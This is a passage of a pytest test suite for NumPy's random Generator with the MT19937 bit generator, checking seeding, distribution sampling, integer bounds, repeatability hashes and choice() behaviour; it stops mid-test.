import sys import hashlib import pytest import numpy as np from numpy.linalg import LinAlgError from numpy.testing import ( assert_, assert_raises, assert_equal, assert_allclose, assert_warns, assert_no_warnings, assert_array_equal, assert_array_almost_equal, suppress_warnings) from numpy.random import Generator, MT19937, SeedSequence random = Generator(MT19937()) JUMP_TEST_DATA = [ { "seed": 0, "steps": 10, "initial": {"key_sha256": "bb1636883c2707b51c5b7fc26c6927af4430f2e0785a8c7bc886337f919f9edf", "pos": 9}, "jumped": {"key_sha256": "ff682ac12bb140f2d72fba8d3506cf4e46817a0db27aae1683867629031d8d55", "pos": 598}, }, { "seed":384908324, "steps":312, "initial": {"key_sha256": "16b791a1e04886ccbbb4d448d6ff791267dc458ae599475d08d5cced29d11614", "pos": 311}, "jumped": {"key_sha256": "a0110a2cf23b56be0feaed8f787a7fc84bef0cb5623003d75b26bdfa1c18002c", "pos": 276}, }, { "seed": [839438204, 980239840, 859048019, 821], "steps": 511, "initial": {"key_sha256": "d306cf01314d51bd37892d874308200951a35265ede54d200f1e065004c3e9ea", "pos": 510}, "jumped": {"key_sha256": "0e00ab449f01a5195a83b4aee0dfbc2ce8d46466a640b92e33977d2e42f777f8", "pos": 475}, }, ] @pytest.fixture(scope='module', params=[True, False]) def endpoint(request): return request.param class TestSeed: def test_scalar(self): s = Generator(MT19937(0)) assert_equal(s.integers(1000), 479) s = Generator(MT19937(4294967295)) assert_equal(s.integers(1000), 324) def test_array(self): s = Generator(MT19937(range(10))) assert_equal(s.integers(1000), 465) s = Generator(MT19937(np.arange(10))) assert_equal(s.integers(1000), 465) s = Generator(MT19937([0])) assert_equal(s.integers(1000), 479) s = Generator(MT19937([4294967295])) assert_equal(s.integers(1000), 324) def test_seedsequence(self): s = MT19937(SeedSequence(0)) assert_equal(s.random_raw(1), 2058676884) def test_invalid_scalar(self): # seed must be an unsigned 32 bit integer assert_raises(TypeError, MT19937, -0.5) assert_raises(ValueError, MT19937, -1) def 
test_invalid_array(self): # seed must be an unsigned integer assert_raises(TypeError, MT19937, [-0.5]) assert_raises(ValueError, MT19937, [-1]) assert_raises(ValueError, MT19937, [1, -2, 4294967296]) def test_noninstantized_bitgen(self): assert_raises(ValueError, Generator, MT19937) class TestBinomial: def test_n_zero(self): # Tests the corner case of n == 0 for the binomial distribution. # binomial(0, p) should be zero for any p in [0, 1]. # This test addresses issue #3480. zeros = np.zeros(2, dtype='int') for p in [0, .5, 1]: assert_(random.binomial(0, p) == 0) assert_array_equal(random.binomial(zeros, p), zeros) def test_p_is_nan(self): # Issue #4571. assert_raises(ValueError, random.binomial, 1, np.nan) class TestMultinomial: def test_basic(self): random.multinomial(100, [0.2, 0.8]) def test_zero_probability(self): random.multinomial(100, [0.2, 0.8, 0.0, 0.0, 0.0]) def test_int_negative_interval(self): assert_(-5 <= random.integers(-5, -1) < -1) x = random.integers(-5, -1, 5) assert_(np.all(-5 <= x)) assert_(np.all(x < -1)) def test_size(self): # gh-3173 p = [0.5, 0.5] assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2)) assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2)) assert_equal(random.multinomial(1, p, np.uint32(1)).shape, (1, 2)) assert_equal(random.multinomial(1, p, [2, 2]).shape, (2, 2, 2)) assert_equal(random.multinomial(1, p, (2, 2)).shape, (2, 2, 2)) assert_equal(random.multinomial(1, p, np.array((2, 2))).shape, (2, 2, 2)) assert_raises(TypeError, random.multinomial, 1, p, float(1)) def test_invalid_prob(self): assert_raises(ValueError, random.multinomial, 100, [1.1, 0.2]) assert_raises(ValueError, random.multinomial, 100, [-.1, 0.9]) def test_invalid_n(self): assert_raises(ValueError, random.multinomial, -1, [0.8, 0.2]) assert_raises(ValueError, random.multinomial, [-1] * 10, [0.8, 0.2]) def test_p_non_contiguous(self): p = np.arange(15.) 
p /= np.sum(p[1::3]) pvals = p[1::3] random = Generator(MT19937(1432985819)) non_contig = random.multinomial(100, pvals=pvals) random = Generator(MT19937(1432985819)) contig = random.multinomial(100, pvals=np.ascontiguousarray(pvals)) assert_array_equal(non_contig, contig) def test_multidimensional_pvals(self): assert_raises(ValueError, random.multinomial, 10, [[0, 1]]) assert_raises(ValueError, random.multinomial, 10, [[0], [1]]) assert_raises(ValueError, random.multinomial, 10, [[[0], [1]], [[1], [0]]]) assert_raises(ValueError, random.multinomial, 10, np.array([[0, 1], [1, 0]])) class TestMultivariateHypergeometric: def setup(self): self.seed = 8675309 def test_argument_validation(self): # Error cases... # `colors` must be a 1-d sequence assert_raises(ValueError, random.multivariate_hypergeometric, 10, 4) # Negative nsample assert_raises(ValueError, random.multivariate_hypergeometric, [2, 3, 4], -1) # Negative color assert_raises(ValueError, random.multivariate_hypergeometric, [-1, 2, 3], 2) # nsample exceeds sum(colors) assert_raises(ValueError, random.multivariate_hypergeometric, [2, 3, 4], 10) # nsample exceeds sum(colors) (edge case of empty colors) assert_raises(ValueError, random.multivariate_hypergeometric, [], 1) # Validation errors associated with very large values in colors. assert_raises(ValueError, random.multivariate_hypergeometric, [999999999, 101], 5, 1, 'marginals') int64_info = np.iinfo(np.int64) max_int64 = int64_info.max max_int64_index = max_int64 // int64_info.dtype.itemsize assert_raises(ValueError, random.multivariate_hypergeometric, [max_int64_index - 100, 101], 5, 1, 'count') @pytest.mark.parametrize('method', ['count', 'marginals']) def test_edge_cases(self, method): # Set the seed, but in fact, all the results in this test are # deterministic, so we don't really need this. 
random = Generator(MT19937(self.seed)) x = random.multivariate_hypergeometric([0, 0, 0], 0, method=method) assert_array_equal(x, [0, 0, 0]) x = random.multivariate_hypergeometric([], 0, method=method) assert_array_equal(x, []) x = random.multivariate_hypergeometric([], 0, size=1, method=method) assert_array_equal(x, np.empty((1, 0), dtype=np.int64)) x = random.multivariate_hypergeometric([1, 2, 3], 0, method=method) assert_array_equal(x, [0, 0, 0]) x = random.multivariate_hypergeometric([9, 0, 0], 3, method=method) assert_array_equal(x, [3, 0, 0]) colors = [1, 1, 0, 1, 1] x = random.multivariate_hypergeometric(colors, sum(colors), method=method) assert_array_equal(x, colors) x = random.multivariate_hypergeometric([3, 4, 5], 12, size=3, method=method) assert_array_equal(x, [[3, 4, 5]]*3) # Cases for nsample: # nsample < 10 # 10 <= nsample < colors.sum()/2 # colors.sum()/2 < nsample < colors.sum() - 10 # colors.sum() - 10 < nsample < colors.sum() @pytest.mark.parametrize('nsample', [8, 25, 45, 55]) @pytest.mark.parametrize('method', ['count', 'marginals']) @pytest.mark.parametrize('size', [5, (2, 3), 150000]) def test_typical_cases(self, nsample, method, size): random = Generator(MT19937(self.seed)) colors = np.array([10, 5, 20, 25]) sample = random.multivariate_hypergeometric(colors, nsample, size, method=method) if isinstance(size, int): expected_shape = (size,) + colors.shape else: expected_shape = size + colors.shape assert_equal(sample.shape, expected_shape) assert_((sample >= 0).all()) assert_((sample <= colors).all()) assert_array_equal(sample.sum(axis=-1), np.full(size, fill_value=nsample, dtype=int)) if isinstance(size, int) and size >= 100000: # This sample is large enough to compare its mean to # the expected values. 
assert_allclose(sample.mean(axis=0), nsample * colors / colors.sum(), rtol=1e-3, atol=0.005) def test_repeatability1(self): random = Generator(MT19937(self.seed)) sample = random.multivariate_hypergeometric([3, 4, 5], 5, size=5, method='count') expected = np.array([[2, 1, 2], [2, 1, 2], [1, 1, 3], [2, 0, 3], [2, 1, 2]]) assert_array_equal(sample, expected) def test_repeatability2(self): random = Generator(MT19937(self.seed)) sample = random.multivariate_hypergeometric([20, 30, 50], 50, size=5, method='marginals') expected = np.array([[ 9, 17, 24], [ 7, 13, 30], [ 9, 15, 26], [ 9, 17, 24], [12, 14, 24]]) assert_array_equal(sample, expected) def test_repeatability3(self): random = Generator(MT19937(self.seed)) sample = random.multivariate_hypergeometric([20, 30, 50], 12, size=5, method='marginals') expected = np.array([[2, 3, 7], [5, 3, 4], [2, 5, 5], [5, 3, 4], [1, 5, 6]]) assert_array_equal(sample, expected) class TestSetState: def setup(self): self.seed = 1234567890 self.rg = Generator(MT19937(self.seed)) self.bit_generator = self.rg.bit_generator self.state = self.bit_generator.state self.legacy_state = (self.state['bit_generator'], self.state['state']['key'], self.state['state']['pos']) def test_gaussian_reset(self): # Make sure the cached every-other-Gaussian is reset. old = self.rg.standard_normal(size=3) self.bit_generator.state = self.state new = self.rg.standard_normal(size=3) assert_(np.all(old == new)) def test_gaussian_reset_in_media_res(self): # When the state is saved with a cached Gaussian, make sure the # cached Gaussian is restored. self.rg.standard_normal() state = self.bit_generator.state old = self.rg.standard_normal(size=3) self.bit_generator.state = state new = self.rg.standard_normal(size=3) assert_(np.all(old == new)) def test_negative_binomial(self): # Ensure that the negative binomial results take floating point # arguments without truncation. 
self.rg.negative_binomial(0.5, 0.5) class TestIntegers: rfunc = random.integers # valid integer/boolean types itype = [bool, np.int8, np.uint8, np.int16, np.uint16, np.int32, np.uint32, np.int64, np.uint64] def test_unsupported_type(self, endpoint): assert_raises(TypeError, self.rfunc, 1, endpoint=endpoint, dtype=float) def test_bounds_checking(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd assert_raises(ValueError, self.rfunc, lbnd - 1, ubnd, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, lbnd, ubnd + 1, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, ubnd, lbnd, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, 1, 0, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [lbnd - 1], ubnd, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [lbnd], [ubnd + 1], endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [ubnd], [lbnd], endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, 1, [0], endpoint=endpoint, dtype=dt) def test_bounds_checking_array(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + (not endpoint) assert_raises(ValueError, self.rfunc, [lbnd - 1] * 2, [ubnd] * 2, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [lbnd] * 2, [ubnd + 1] * 2, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, ubnd, [lbnd] * 2, endpoint=endpoint, dtype=dt) assert_raises(ValueError, self.rfunc, [1] * 2, 0, endpoint=endpoint, dtype=dt) def test_rng_zero_and_extremes(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd is_open = not endpoint tgt = ubnd - 1 assert_equal(self.rfunc(tgt, tgt + is_open, size=1000, 
endpoint=endpoint, dtype=dt), tgt) assert_equal(self.rfunc([tgt], tgt + is_open, size=1000, endpoint=endpoint, dtype=dt), tgt) tgt = lbnd assert_equal(self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt), tgt) assert_equal(self.rfunc(tgt, [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt), tgt) tgt = (lbnd + ubnd) // 2 assert_equal(self.rfunc(tgt, tgt + is_open, size=1000, endpoint=endpoint, dtype=dt), tgt) assert_equal(self.rfunc([tgt], [tgt + is_open], size=1000, endpoint=endpoint, dtype=dt), tgt) def test_rng_zero_and_extremes_array(self, endpoint): size = 1000 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd tgt = ubnd - 1 assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt) tgt = lbnd assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt) tgt = (lbnd + ubnd) // 2 assert_equal(self.rfunc([tgt], [tgt + 1], size=size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, dtype=dt), tgt) assert_equal(self.rfunc( [tgt] * size, [tgt + 1] * size, size=size, dtype=dt), tgt) def test_full_range(self, endpoint): # Test for ticket #1690 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd try: self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt) except Exception as e: raise AssertionError("No error should have been raised, " "but one was with the following " "message:\n\n%s" % str(e)) def test_full_range_array(self, endpoint): # Test for ticket #1690 for dt in self.itype: lbnd = 0 if dt is 
bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd try: self.rfunc([lbnd] * 2, [ubnd], endpoint=endpoint, dtype=dt) except Exception as e: raise AssertionError("No error should have been raised, " "but one was with the following " "message:\n\n%s" % str(e)) def test_in_bounds_fuzz(self, endpoint): # Don't use fixed seed random = Generator(MT19937()) for dt in self.itype[1:]: for ubnd in [4, 8, 16]: vals = self.rfunc(2, ubnd - endpoint, size=2 ** 16, endpoint=endpoint, dtype=dt) assert_(vals.max() < ubnd) assert_(vals.min() >= 2) vals = self.rfunc(0, 2 - endpoint, size=2 ** 16, endpoint=endpoint, dtype=bool) assert_(vals.max() < 2) assert_(vals.min() >= 0) def test_scalar_array_equiv(self, endpoint): for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd size = 1000 random = Generator(MT19937(1234)) scalar = random.integers(lbnd, ubnd, size=size, endpoint=endpoint, dtype=dt) random = Generator(MT19937(1234)) scalar_array = random.integers([lbnd], [ubnd], size=size, endpoint=endpoint, dtype=dt) random = Generator(MT19937(1234)) array = random.integers([lbnd] * size, [ubnd] * size, size=size, endpoint=endpoint, dtype=dt) assert_array_equal(scalar, scalar_array) assert_array_equal(scalar, array) def test_repeatability(self, endpoint): # We use a sha256 hash of generated sequences of 1000 samples # in the range [0, 6) for all but bool, where the range # is [0, 2). Hashes are for little endian numbers. 
tgt = {'bool': '053594a9b82d656f967c54869bc6970aa0358cf94ad469c81478459c6a90eee3', 'int16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4', 'int32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b', 'int64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1', 'int8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1', 'uint16': '54de9072b6ee9ff7f20b58329556a46a447a8a29d67db51201bf88baa6e4e5d4', 'uint32': 'd3a0d5efb04542b25ac712e50d21f39ac30f312a5052e9bbb1ad3baa791ac84b', 'uint64': '14e224389ac4580bfbdccb5697d6190b496f91227cf67df60989de3d546389b1', 'uint8': '0e203226ff3fbbd1580f15da4621e5f7164d0d8d6b51696dd42d004ece2cbec1'} for dt in self.itype[1:]: random = Generator(MT19937(1234)) # view as little endian for hash if sys.byteorder == 'little': val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt) else: val = random.integers(0, 6 - endpoint, size=1000, endpoint=endpoint, dtype=dt).byteswap() res = hashlib.sha256(val).hexdigest() assert_(tgt[np.dtype(dt).name] == res) # bools do not depend on endianness random = Generator(MT19937(1234)) val = random.integers(0, 2 - endpoint, size=1000, endpoint=endpoint, dtype=bool).view(np.int8) res = hashlib.sha256(val).hexdigest() assert_(tgt[np.dtype(bool).name] == res) def test_repeatability_broadcasting(self, endpoint): for dt in self.itype: lbnd = 0 if dt in (bool, np.bool_) else np.iinfo(dt).min ubnd = 2 if dt in (bool, np.bool_) else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd # view as little endian for hash random = Generator(MT19937(1234)) val = random.integers(lbnd, ubnd, size=1000, endpoint=endpoint, dtype=dt) random = Generator(MT19937(1234)) val_bc = random.integers([lbnd] * 1000, ubnd, endpoint=endpoint, dtype=dt) assert_array_equal(val, val_bc) random = Generator(MT19937(1234)) val_bc = random.integers([lbnd] * 1000, [ubnd] * 1000, endpoint=endpoint, dtype=dt) assert_array_equal(val, val_bc) 
@pytest.mark.parametrize( 'bound, expected', [(2**32 - 1, np.array([517043486, 1364798665, 1733884389, 1353720612, 3769704066, 1170797179, 4108474671])), (2**32, np.array([517043487, 1364798666, 1733884390, 1353720613, 3769704067, 1170797180, 4108474672])), (2**32 + 1, np.array([517043487, 1733884390, 3769704068, 4108474673, 1831631863, 1215661561, 3869512430]))] ) def test_repeatability_32bit_boundary(self, bound, expected): for size in [None, len(expected)]: random = Generator(MT19937(1234)) x = random.integers(bound, size=size) assert_equal(x, expected if size is not None else expected[0]) def test_repeatability_32bit_boundary_broadcasting(self): desired = np.array([[[1622936284, 3620788691, 1659384060], [1417365545, 760222891, 1909653332], [3788118662, 660249498, 4092002593]], [[3625610153, 2979601262, 3844162757], [ 685800658, 120261497, 2694012896], [1207779440, 1586594375, 3854335050]], [[3004074748, 2310761796, 3012642217], [2067714190, 2786677879, 1363865881], [ 791663441, 1867303284, 2169727960]], [[1939603804, 1250951100, 298950036], [1040128489, 3791912209, 3317053765], [3155528714, 61360675, 2305155588]], [[ 817688762, 1335621943, 3288952434], [1770890872, 1102951817, 1957607470], [3099996017, 798043451, 48334215]]]) for size in [None, (5, 3, 3)]: random = Generator(MT19937(12345)) x = random.integers([[-1], [0], [1]], [2**32 - 1, 2**32, 2**32 + 1], size=size) assert_array_equal(x, desired if size is not None else desired[0]) def test_int64_uint64_broadcast_exceptions(self, endpoint): configs = {np.uint64: ((0, 2**65), (-1, 2**62), (10, 9), (0, 0)), np.int64: ((0, 2**64), (-(2**64), 2**62), (10, 9), (0, 0), (-2**63-1, -2**63-1))} for dtype in configs: for config in configs[dtype]: low, high = config high = high - endpoint low_a = np.array([[low]*10]) high_a = np.array([high] * 10) assert_raises(ValueError, random.integers, low, high, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low_a, high, endpoint=endpoint, dtype=dtype) 
assert_raises(ValueError, random.integers, low, high_a, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low_a, high_a, endpoint=endpoint, dtype=dtype) low_o = np.array([[low]*10], dtype=object) high_o = np.array([high] * 10, dtype=object) assert_raises(ValueError, random.integers, low_o, high, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low, high_o, endpoint=endpoint, dtype=dtype) assert_raises(ValueError, random.integers, low_o, high_o, endpoint=endpoint, dtype=dtype) def test_int64_uint64_corner_case(self, endpoint): # When stored in Numpy arrays, `lbnd` is casted # as np.int64, and `ubnd` is casted as np.uint64. # Checking whether `lbnd` >= `ubnd` used to be # done solely via direct comparison, which is incorrect # because when Numpy tries to compare both numbers, # it casts both to np.float64 because there is # no integer superset of np.int64 and np.uint64. However, # `ubnd` is too large to be represented in np.float64, # causing it be round down to np.iinfo(np.int64).max, # leading to a ValueError because `lbnd` now equals # the new `ubnd`. dt = np.int64 tgt = np.iinfo(np.int64).max lbnd = np.int64(np.iinfo(np.int64).max) ubnd = np.uint64(np.iinfo(np.int64).max + 1 - endpoint) # None of these function calls should # generate a ValueError now. 
actual = random.integers(lbnd, ubnd, endpoint=endpoint, dtype=dt) assert_equal(actual, tgt) def test_respect_dtype_singleton(self, endpoint): # See gh-7203 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd dt = np.bool_ if dt is bool else dt sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt) assert_equal(sample.dtype, dt) for dt in (bool, int, np.compat.long): lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd # gh-7284: Ensure that we get Python data types sample = self.rfunc(lbnd, ubnd, endpoint=endpoint, dtype=dt) assert not hasattr(sample, 'dtype') assert_equal(type(sample), dt) def test_respect_dtype_array(self, endpoint): # See gh-7203 for dt in self.itype: lbnd = 0 if dt is bool else np.iinfo(dt).min ubnd = 2 if dt is bool else np.iinfo(dt).max + 1 ubnd = ubnd - 1 if endpoint else ubnd dt = np.bool_ if dt is bool else dt sample = self.rfunc([lbnd], [ubnd], endpoint=endpoint, dtype=dt) assert_equal(sample.dtype, dt) sample = self.rfunc([lbnd] * 2, [ubnd] * 2, endpoint=endpoint, dtype=dt) assert_equal(sample.dtype, dt) def test_zero_size(self, endpoint): # See gh-7203 for dt in self.itype: sample = self.rfunc(0, 0, (3, 0, 4), endpoint=endpoint, dtype=dt) assert sample.shape == (3, 0, 4) assert sample.dtype == dt assert self.rfunc(0, -10, 0, endpoint=endpoint, dtype=dt).shape == (0,) assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4)) assert_equal(random.integers(0, -10, size=0).shape, (0,)) assert_equal(random.integers(10, 10, size=0).shape, (0,)) def test_error_byteorder(self): other_byteord_dt = '<i4' if sys.byteorder == 'big' else '>i4' with pytest.raises(ValueError): random.integers(0, 200, size=10, dtype=other_byteord_dt) # chi2max is the maximum acceptable chi-squared value. 
    @pytest.mark.slow
    @pytest.mark.parametrize('sample_size,high,dtype,chi2max',
                             [(5000000, 5, np.int8, 125.0),  # p-value ~4.6e-25
                              (5000000, 7, np.uint8, 150.0),  # p-value ~7.7e-30
                              (10000000, 2500, np.int16, 3300.0),  # p-value ~3.0e-25
                              (50000000, 5000, np.uint16, 6500.0),  # p-value ~3.5e-25
                              ])
    def test_integers_small_dtype_chisquared(self, sample_size, high,
                                             dtype, chi2max):
        # Regression test for gh-14774.
        samples = random.integers(high, size=sample_size, dtype=dtype)

        values, counts = np.unique(samples, return_counts=True)
        expected = sample_size / high
        chi2 = ((counts - expected)**2 / expected).sum()
        assert chi2 < chi2max


class TestRandomDist:
    # Make sure the random distribution returns the correct value for a
    # given seed

    def setup(self):
        self.seed = 1234567890

    def test_integers(self):
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2))
        desired = np.array([[-80, -56], [41, 37], [-83, -16]])
        assert_array_equal(actual, desired)

    def test_integers_masked(self):
        # Test masked rejection sampling algorithm to generate array of
        # uint32 in an interval.
        random = Generator(MT19937(self.seed))
        actual = random.integers(0, 99, size=(3, 2), dtype=np.uint32)
        desired = np.array([[9, 21], [70, 68], [8, 41]], dtype=np.uint32)
        assert_array_equal(actual, desired)

    def test_integers_closed(self):
        random = Generator(MT19937(self.seed))
        actual = random.integers(-99, 99, size=(3, 2), endpoint=True)
        desired = np.array([[-80, -56], [41, 38], [-83, -15]])
        assert_array_equal(actual, desired)

    def test_integers_max_int(self):
        # Tests whether integers with closed=True can generate the
        # maximum allowed Python int that can be converted
        # into a C long. Previous implementations of this
        # method have thrown an OverflowError when attempting
        # to generate this integer.
        actual = random.integers(np.iinfo('l').max, np.iinfo('l').max,
                                 endpoint=True)
        desired = np.iinfo('l').max
        assert_equal(actual, desired)

    def test_random(self):
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.096999199829214, 0.707517457682192],
                            [0.084364834598269, 0.767731206553125],
                            [0.665069021359413, 0.715487190596693]])
        assert_array_almost_equal(actual, desired, decimal=15)

        # A fresh generator with the same seed yields the same first draw.
        random = Generator(MT19937(self.seed))
        actual = random.random()
        assert_array_almost_equal(actual, desired[0, 0], decimal=15)

    def test_random_float(self):
        random = Generator(MT19937(self.seed))
        actual = random.random((3, 2))
        desired = np.array([[0.0969992, 0.70751746],
                            [0.08436483, 0.76773121],
                            [0.66506902, 0.71548719]])
        assert_array_almost_equal(actual, desired, decimal=7)

    def test_random_float_scalar(self):
        random = Generator(MT19937(self.seed))
        actual = random.random(dtype=np.float32)
        desired = 0.0969992
        assert_array_almost_equal(actual, desired, decimal=7)

    def test_random_unsupported_type(self):
        assert_raises(TypeError, random.random, dtype='int32')

    def test_choice_uniform_replace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4)
        desired = np.array([0, 0, 2, 2], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_nonuniform_replace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 4, p=[0.4, 0.4, 0.1, 0.1])
        desired = np.array([0, 1, 0, 1], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_uniform_noreplace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False)
        desired = np.array([2, 0, 3], dtype=np.int64)
        assert_array_equal(actual, desired)
        # shuffle=False keeps the selected items in their original order.
        actual = random.choice(4, 4, replace=False, shuffle=False)
        desired = np.arange(4, dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_nonuniform_noreplace(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(4, 3, replace=False, p=[0.1, 0.3, 0.5, 0.1])
        desired = np.array([0, 2, 3], dtype=np.int64)
        assert_array_equal(actual, desired)

    def test_choice_noninteger(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice(['a', 'b', 'c', 'd'], 4)
        desired = np.array(['a', 'a', 'c', 'c'])
        assert_array_equal(actual, desired)

    def test_choice_multidimensional_default_axis(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 3)
        desired = np.array([[0, 1], [0, 1], [4, 5]])
        assert_array_equal(actual, desired)

    def test_choice_multidimensional_custom_axis(self):
        random = Generator(MT19937(self.seed))
        actual = random.choice([[0, 1], [2, 3], [4, 5], [6, 7]], 1, axis=1)
        desired = np.array([[0], [2], [4], [6]])
        assert_array_equal(actual, desired)

    def test_choice_exceptions(self):
        sample = random.choice
        assert_raises(ValueError, sample, -1, 3)
        assert_raises(ValueError, sample, 3., 3)
        assert_raises(ValueError, sample, [], 3)
        assert_raises(ValueError, sample, [1, 2, 3, 4], 3,
                      p=[[0.25, 0.25], [0.25, 0.25]])
        assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4, 0.2])
        assert_raises(ValueError, sample, [1, 2], 3, p=[1.1, -0.1])
        assert_raises(ValueError, sample, [1, 2], 3, p=[0.4, 0.4])
        assert_raises(ValueError, sample, [1, 2, 3], 4, replace=False)
        # gh-13087
        assert_raises(ValueError, sample, [1, 2, 3], -2, replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], (-1,), replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], (-1, 1), replace=False)
        assert_raises(ValueError, sample, [1, 2, 3], 2,
                      replace=False, p=[1, 0, 0])

    def test_choice_return_shape(self):
        p = [0.1, 0.9]
        # Check scalar
        assert_(np.isscalar(random.choice(2, replace=True)))
        assert_(np.isscalar(random.choice(2, replace=False)))
        assert_(np.isscalar(random.choice(2, replace=True, p=p)))
        assert_(np.isscalar(random.choice(2, replace=False, p=p)))
        assert_(np.isscalar(random.choice([1, 2], replace=True)))
        assert_(random.choice([None], replace=True) is None)
        a = np.array([1, 2])
        arr = np.empty(1, dtype=object)
        arr[0] = a
        assert_(random.choice(arr, replace=True) is a)

        # Check 0-d array
        s = tuple()
        assert_(not np.isscalar(random.choice(2, s, replace=True)))
        assert_(not np.isscalar(random.choice(2, s, replace=False)))
        assert_(not np.isscalar(random.choice(2, s, replace=True, p=p)))
        assert_(not np.isscalar(random.choice(2, s, replace=False, p=p)))
        assert_(not np.isscalar(random.choice([1, 2], s, replace=True)))
        assert_(random.choice([None], s, replace=True).ndim == 0)
        a = np.array([1, 2])
        arr = np.empty(1, dtype=object)
        arr[0] = a
        assert_(random.choice(arr, s, replace=True).item() is a)

        # Check multi dimensional array
        s = (2, 3)
        p = [0.1, 0.1, 0.1, 0.1, 0.4, 0.2]
        assert_equal(random.choice(6, s, replace=True).shape, s)
        assert_equal(random.choice(6, s, replace=False).shape, s)
        assert_equal(random.choice(6, s, replace=True, p=p).shape, s)
        assert_equal(random.choice(6, s, replace=False, p=p).shape, s)
        assert_equal(random.choice(np.arange(6), s, replace=True).shape, s)

        # Check zero-size
        assert_equal(random.integers(0, 0, size=(3, 0, 4)).shape, (3, 0, 4))
        assert_equal(random.integers(0, -10, size=0).shape, (0,))
        assert_equal(random.integers(10, 10, size=0).shape, (0,))
        assert_equal(random.choice(0, size=0).shape, (0,))
        assert_equal(random.choice([], size=(0,)).shape, (0,))
        assert_equal(random.choice(['a', 'b'], size=(3, 0, 4)).shape,
                     (3, 0, 4))
        assert_raises(ValueError, random.choice, [], 10)

    def test_choice_nan_probabilities(self):
        a = np.array([42, 1, 2])
        p = [None, None, None]
        assert_raises(ValueError, random.choice, a, p=p)

    def test_choice_p_non_contiguous(self):
        p = np.ones(10) / 5
        p[1::2] = 3.0
        random = Generator(MT19937(self.seed))
        non_contig = random.choice(5, 3, p=p[::2])
        random = Generator(MT19937(self.seed))
        contig = random.choice(5, 3, p=np.ascontiguousarray(p[::2]))
        assert_array_equal(non_contig, contig)

    def test_choice_return_type(self):
        # gh 9867
        p = np.ones(4) / 4.
        actual = random.choice(4, 2)
        assert actual.dtype == np.int64
        actual = random.choice(4, 2, replace=False)
        assert actual.dtype == np.int64
        actual = random.choice(4, 2, p=p)
